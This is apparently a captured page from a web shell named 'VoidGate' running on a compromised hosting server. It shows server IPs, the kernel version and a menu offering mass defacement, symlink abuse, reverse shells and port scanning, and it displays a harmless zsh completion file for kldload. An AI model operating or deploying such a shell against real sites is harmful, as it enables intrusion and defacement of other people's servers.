ヤミRoot VoidGate
User / IP
:
216.73.216.49
Host / Server
:
146.88.233.70 / www.dev.loger.cm
System
:
Linux hybrid1120.fr.ns.planethoster.net 3.10.0-957.21.2.el7.x86_64 #1 SMP Wed Jun 5 14:26:44 UTC 2019 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
usr
/
share
/
zsh
/
5.0.2
/
functions
/
Viewing: _kld
#compdef kldload kldunload (( $+functions[_kld_module] )) || _kld_module() { local ret=1 compadd "$@" - /boot/kernel/*.ko(-.:t) /modules/*.ko(-.:t) && ret=0 _files "$@" -g '*.ko(-.)' && ret=0 return ret } (( $+functions[_kld_unload] )) || _kld_unload() { compadd "$@" - $( /sbin/kldstat | awk '($1 ~ /^[0-9]/) { print $5 }' ) } (( $+functions[_kld_unload_id] )) || _kld_unload_id() { compadd "$@" - $( /sbin/kldstat | awk '($1 ~ /^[0-9]/) { print $1 }' ) } _kld() { unset _cache_sysctlvars case "$service" in kldload) _arguments -s \ '-v[be verbose]' \ '*:module to load:_kld_module' ;; kldunload) _arguments -s \ '-v[be verbose]' \ '(-n)-i:module id to unload:_kld_unload_id' \ '(-i)-n:module to unload:_kld_unload' \ '*:module to unload:_kld_unload' ;; esac } _kld "$@"
Coded With 💗 by
0x6ick